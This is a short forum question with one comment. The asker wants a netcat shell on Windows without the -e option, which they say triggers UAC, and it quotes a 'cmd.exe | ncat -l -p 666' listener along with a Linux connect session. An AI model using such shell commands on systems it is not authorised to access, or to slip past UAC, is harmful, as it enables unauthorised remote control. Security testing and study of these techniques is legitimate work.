1
Is there any way to get a reverse shell in Windows using netcat without using -e option since it triggers UAC?
I made it work from Linux to Linux by using a named pipe. I wanted to achieve something similar in Windows.
Running c:\windows\system32\cmd.exe | ncat -l -p 666
on Windows gives me a prompt in Linux when I connect:
# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\user> dir
^C
It looks like I'm close, maybe something simple is missing? If only there were named pipes in Windows...
Thank for posting this Jay. But I believe you need Admin priv to install cygwin and that defeats the purpose of it. – Adriano_epifas – 2017-12-12T17:31:00.790